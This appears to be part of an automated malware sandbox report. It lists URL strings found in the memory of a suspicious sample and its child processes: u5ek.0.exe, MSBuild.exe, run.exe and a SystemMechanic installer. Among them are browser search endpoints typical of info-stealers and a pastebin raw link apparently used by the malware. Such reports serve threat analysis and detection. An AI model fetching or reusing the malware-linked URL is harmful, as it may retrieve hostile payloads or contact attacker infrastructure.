Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.00000000075F9000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.000000000720D000.00000004.00000020.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000003.2249141509.0000000002662000.00000004.00001000.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000000.1817573323.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://www.indyproject.org/
Source: run.exe, 00000002.00000002.1865849409.000000000262B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.000000000577C000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003D7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.info-zip.org/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.iolo.com/products/byepass/welcome/?utm_source=bp&utm_medium=product&p=d59cc353-e8e4-4f42-
Source: u5ek.0.exe, u5ek.0.exe, 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: u5ek.0.exe, 00000001.00000002.2173534479.000000001E637000.00000004.00000020.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2206231639.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/cps0(
Source: run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/rpa00
Source: run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0
Source: run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0/
Source: u5ek.0.exe, 00000001.00000003.1759189708.000000000439B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003328000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003726000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.00000000032B9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003784000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: u5ek.0.exe, 00000001.00000003.1759189708.000000000439B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003328000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003726000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.00000000032B9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003784000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: u5ek.0.exe, 00000001.00000003.1759189708.000000000439B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003328000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003726000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.00000000032B9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003784000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: u5ek.0.exe, 00000001.00000003.1759189708.000000000439B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003328000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003726000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.00000000032B9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003784000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2930988903.000002727CF20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/Jhttps://rt.services.visualstudio.com/Fhttps://profiler.monitor
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/api/profiles/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2930988903.000002727CF20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/f
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/v2/track
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://download.avira.com/download/
Source: u5ek.3.exe, 00000006.00000003.2249141509.0000000002624000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.6-
Source: u5ek.0.exe, 00000001.00000003.1759189708.000000000439B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003726000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.00000000032B9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003323000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003784000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: u5ek.0.exe, 00000001.00000003.1759189708.000000000439B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003726000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.00000000032B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: MSBuild.exe, 0000000D.00000002.2875147556.0000000003323000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003784000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabS
Source: u5ek.0.exe, 00000001.00000003.1759189708.000000000439B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003726000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.00000000032B9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003323000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003784000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927691162.000002727CDC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2930988903.000002727CF20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.000002721001C000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2913908071.000002721BB00000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/Microsoft/ApplicationInsights-dotnet
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.000002721001C000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2913908071.000002721BB00000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/Microsoft/ApplicationInsights-dotnetw
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&l
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&m
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&o
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&r
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&s
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&v
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&z
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/microsoft/ApplicationInsights-dotnet/issues/2560
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950490595.000002727F082000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://indiantypefoundry.com
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iolo.azure-api.net/ent/v1
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iolo.comH42652B74-0AD8-4B60-B8FD-69ED38F7666B
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://monitor.azure.com//.default
Source: MSBuild.exe, 0000000D.00000002.2875147556.0000000003201000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/z9pYkqPQ
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://profiler.monitor.azure.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2930988903.000002727CF20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://profiler.monitor.azure.com/l
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rt.services.visualstudio.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2930988903.000002727CF20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rt.services.visualstudio.com/l
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950490595.000002727F082000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scripts.sil.org/OFL
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://scripts.sil.org/OFLThis
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950490595.000002727F082000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scripts.sil.org/OFLX8
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinad
Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.00000000075F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0D
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://snapshot.monitor.azure.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2930988903.000002727CF20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://snapshot.monitor.azure.com/&
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.iolo.com/support/solutions/articles/44001781185
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.iolo.com/support/solutions/articles/44001781185?
Source: u5ek.0.exe, 00000001.00000003.1883816519.000000002A908000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: u5ek.0.exe, 00000001.00000003.1883816519.000000002A908000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: u5ek.0.exe, 00000001.00000003.1752307991.00000000245BD000.00000004.00000020.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: u5ek.0.exe, 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
Source: u5ek.0.exe, 00000001.00000003.1752307991.00000000245BD000.00000004.00000020.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: u5ek.0.exe, 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://taskscheduler.codeplex.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://taskscheduler.codeplex.com/H
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://webhooklistenersfunc.azurewebsites.net/api/lookup/constella-dark-web-alerts
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2-2.in.applicationinsights.azure.com
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/;LiveEndpoint=https://westus2.livediagnostics.mon
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/v2/track
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2.livediagnostics.monitor.azure.com/
Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.00000000075F9000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: u5ek.0.exe, 00000001.00000003.1759189708.000000000439B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003328000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003726000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.00000000032B9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003784000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: u5ek.0.exe, 00000001.00000003.1759189708.000000000439B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003726000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.00000000032B9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003323000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003784000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/eula/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/eula/?
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/privacy/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/privacy/?
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/sales-policy/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/sales-policy/?
Source: u5ek.0.exe, 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: u5ek.0.exe, 00000001.00000003.1883816519.000000002A908000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: u5ek.0.exe, 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: u5ek.0.exe, 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: u5ek.0.exe, 00000001.00000003.1883816519.000000002A908000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: u5ek.0.exe, 00000001.00000003.1883816519.000000002A908000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: u5ek.0.exe, 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: u5ek.0.exe, 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: u5ek.0.exe, 00000001.00000003.1883816519.000000002A908000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927691162.000002727CDC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.newtonsoft.com/json
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.newtonsoft.com/jsonschema
